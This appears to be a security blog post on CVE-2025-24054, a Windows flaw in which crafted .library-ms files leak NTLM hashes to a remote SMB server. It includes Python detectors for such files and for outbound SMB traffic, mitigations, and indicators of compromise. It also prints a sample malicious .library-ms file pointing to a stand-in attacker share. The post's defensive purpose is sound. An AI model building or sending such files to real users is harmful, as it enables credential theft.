Windows 10/11 NTLM Hash Disclosure Spoofing (CVE-2025-24054)
In March 2025, Microsoft disclosed and patched a security vulnerability affecting Windows 10 and Windows 11. Tracked as CVE-2025-24054, this flaw allows attackers to use crafted .library-ms files to trigger NTLM hash disclosure: Windows Explorer parses the file and authenticates to an attacker-controlled SMB server. The proof-of-concept (PoC) requires user interaction, but only minimal interaction with the file in Explorer, and the bug highlights the ongoing risks around legacy authentication protocols in Windows environments.
This blog provides a technical breakdown, impact assessment, and mitigation strategies for organizations and security professionals.
What is CVE-2025-24054?
- Type of vulnerability: NTLM hash disclosure via spoofed .library-ms files.
- Affected systems: Windows 10 (x64) and Windows 11 (x64).
- Attack vector: Malicious .library-ms files pointing to a remote UNC path.
- Impact: When the file is handled, Windows attempts to authenticate to the attacker-controlled share, leaking the user's NTLM credentials (an NTLMv2 challenge-response hash).
How the Exploit Works
- Crafting the file: A .library-ms XML file is generated with a <url> tag pointing to a UNC path such as \\attacker\share.
- Packaging for delivery: The file is often compressed into a ZIP archive for distribution.
- User interaction: When the victim extracts or opens the file, Windows Explorer parses the library description and automatically tries to connect to the UNC path.
- NTLM hash leakage: During this SMB connection attempt, NTLM authentication is triggered, sending the user's NTLMv2 response to the attacker's server, where it is captured.
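To make the file structure concrete, here is an added example (not code from the original post or from the PoC script described below) that parses a .library-ms file, on its own or inside a ZIP archive, and reports every <url> element that names a remote host. The library-description XML is constructed for this example in the shape Windows uses; the \\attacker\share target is the placeholder from the post, and the archive member names are made up.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Constructed sample in the shape of a Windows library description (.library-ms).
# The <url> inside <simpleLocation> is what Explorer resolves when it handles the file.
SAMPLE_LIBRARY_MS = r"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>\\attacker\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

# A benign library for comparison: same structure, but it points at a local folder.
BENIGN_LIBRARY_MS = SAMPLE_LIBRARY_MS.replace(r"\\attacker\share", r"C:\Users\Public\Documents")

# \\host\share or //host/share (Windows accepts both slash styles)
UNC_RE = re.compile(r"^[\\/]{2}([^\\/]+)")
# file://host/... (file:///C:/... has an empty host and is left alone)
FILE_URL_RE = re.compile(r"^file://([^/\\]+)[/\\]", re.IGNORECASE)


def remote_locations(data: bytes) -> list:
    """Return (url, host) for every <url> element in a .library-ms that names a remote host."""
    root = ET.fromstring(data)
    hits = []
    for el in root.iter():
        local_name = el.tag.rsplit("}", 1)[-1]  # drop the '{namespace}' prefix
        if local_name != "url" or not el.text:
            continue
        value = el.text.strip()
        m = UNC_RE.match(value) or FILE_URL_RE.match(value)
        if m:
            hits.append((value, m.group(1)))
    return hits


def scan_zip(zip_bytes: bytes) -> dict:
    """Map each .library-ms member of an archive to the remote locations it references."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".library-ms"):
                continue
            try:
                hits = remote_locations(zf.read(name))
            except ET.ParseError:
                # Malformed XML will not be parsed by Explorer either; it is not a hit,
                # but a real scanner should log it rather than drop it silently.
                hits = []
            if hits:
                findings[name] = hits
    return findings


def build_zip(members: dict) -> bytes:
    """Lab helper: build an in-memory ZIP so the scanner can be exercised offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


if __name__ == "__main__":
    archive = build_zip({
        "invoice.library-ms": SAMPLE_LIBRARY_MS.encode("utf-8"),
        "ok.library-ms": BENIGN_LIBRARY_MS.encode("utf-8"),
        "readme.txt": b"constructed filler member",
    })
    for member, hits in scan_zip(archive).items():
        for url, host in hits:
            print(f"{member}: remote location {url} (host {host})")
```

The scanner matches on the element's local name rather than the full namespaced tag so it still works if a sample omits the namespace, and it flags any two-slash prefix because Windows will attempt the connection for either form; mail-gateway or endpoint tooling can apply the same logic to attachments before they reach Explorer.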
Proof-of-Concept Script
The proof-of-concept script has the following capabilities:
- Validation of target hostnames/IPs.
- Generation of .library-ms XML content.
- Packaging into a ZIP archive.
- Optional dry-run mode for safe testing.
This script is intended for responsible disclosure and lab testing only.
Security Implications
- Credential theft: NTLM hashes can be captured and cracked offline.
- Lateral movement: Compromised credentials may allow attackers to move across systems.
- Social engineering risk: Attackers may disguise malicious files as legitimate resources.
Mitigation Strategies
To protect against CVE-2025-24054:
- Block outbound SMB traffic (TCP 445 and 139) from workstations to the internet and other untrusted networks.
- Disable NTLM authentication where possible; migrate to Kerberos. Where NTLM cannot be removed yet, use the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" policy to audit and then deny outbound NTLM.
- Apply the Microsoft security update that addresses CVE-2025-24054 (released with the March 2025 Patch Tuesday) to all affected systems.
- User awareness training: Educate employees not to open or extract unexpected .library-ms files, or archives containing them.
- Monitoring & detection: Watch for outbound SMB connections to external hosts, NTLM authentication to unknown servers, and .library-ms files arriving by email or download. Note that if SMB is blocked, Windows can fall back to WebDAV over HTTP, which also carries NTLM, so watch that path too.
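As an added example of the monitoring point above (this is not part of the original post), the following Python parses constructed firewall log lines and flags outbound TCP connections to SMB ports on external addresses. The log format, the source addresses and the timestamps are assumptions made for this example; two of the destination IPs are the (re-fanged) endpoints from the IoC table below, and the third is an arbitrary public address.

```python
import ipaddress
import re

# Constructed firewall log lines; the format is assumed for this example.
SAMPLE_LOG = """\
2025-03-20T10:15:02Z src=10.0.1.23:51234 dst=10.0.0.5:445 proto=tcp action=allow
2025-03-20T10:15:09Z src=10.0.1.23:51240 dst=159.196.128.120:445 proto=tcp action=allow
2025-03-20T10:15:10Z src=10.0.1.23:51241 dst=8.8.8.8:53 proto=udp action=allow
2025-03-20T10:16:30Z src=10.0.1.42:52001 dst=194.127.179.157:445 proto=tcp action=deny
2025-03-20T10:17:00Z src=10.0.1.42:52002 dst=93.184.216.34:139 proto=tcp action=allow
"""

# Endpoint IPs from the IoC table on this page, fanged so ipaddress can parse them.
KNOWN_BAD = frozenset({"159.196.128.120", "194.127.179.157"})

SMB_PORTS = {445, 139}

LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+src=(?P<src>[\d.]+):(?P<sport>\d+)\s+"
    r"dst=(?P<dst>[\d.]+):(?P<dport>\d+)\s+proto=(?P<proto>\w+)\s+action=(?P<action>\w+)$"
)


def is_external(ip_str: str) -> bool:
    """True for routable addresses outside private, loopback, link-local and multicast ranges."""
    ip = ipaddress.ip_address(ip_str)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_multicast)


def smb_egress_alerts(log_text: str, known_bad=KNOWN_BAD) -> list:
    """Return one alert dict per TCP connection to an SMB port on an external host.

    Denied connections are kept on purpose: a blocked attempt still shows that a
    client parsed something pointing at an outside share, which is the signal
    that matters for this CVE even when the firewall did its job.
    """
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # unrelated or malformed line
        dport = int(m["dport"])
        if m["proto"].lower() != "tcp" or dport not in SMB_PORTS:
            continue
        dst = m["dst"]
        if not is_external(dst):
            continue  # internal file servers are expected SMB traffic
        alerts.append({
            "ts": m["ts"],
            "src": m["src"],
            "dst": dst,
            "dport": dport,
            "action": m["action"],
            "ioc_match": dst in known_bad,
        })
    return alerts


if __name__ == "__main__":
    for a in smb_egress_alerts(SAMPLE_LOG):
        label = "KNOWN IOC" if a["ioc_match"] else "external SMB"
        print(f'{a["ts"]} {a["src"]} -> {a["dst"]}:{a["dport"]} ({a["action"]}) {label}')
```

Matching on destination port alone is deliberately broad: any workstation talking SMB to the internet is worth a look, and the IoC match only raises the priority. Extend the same rule to TCP 80/443 toward unknown hosts from the WebClient service if you want to catch the WebDAV fallback as well.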
Indicators of Compromise
| Description | Value |
|---|---|
| Archive NTLM Exploits Bomb | 9ca72d969d7c5494a30e996324c6c0fcb72ae1ae |
| xd.website | 84132ae00239e15b50c1a20126000eed29388100 |
| xd.url | 76e93c97ffdb5adb509c966bca22e12c4508dcaa |
| xd.library-ms | 7dd0131dd4660be562bc869675772e58a1e3ac8e |
| xd.lnk | 5e42c6d12f6b51364b6bfb170f4306c5ce608b4f |
| NTLM Exploits Bomb Endpoint | 159.196.128[.]120 |
| Unzipped Exploits (1) | 054784f1a398a35e0c5242cbfa164df0c277da73 |
| Unzipped Exploits (2) | 7a43c177a582c777e258246f0ba818f9e73a69ab |
| Unzipped Campaign Endpoint | 194.127.179[.]157 |
Conclusion
The disclosure of CVE-2025-24054 underscores the risks of legacy authentication mechanisms like NTLM. Although the exploit requires user interaction, that interaction is slight, and attackers can weaponize social engineering to achieve credential theft. Organizations should apply Microsoft's patch, harden their environments against outbound NTLM, and monitor for suspicious SMB activity.
Reference: Microsoft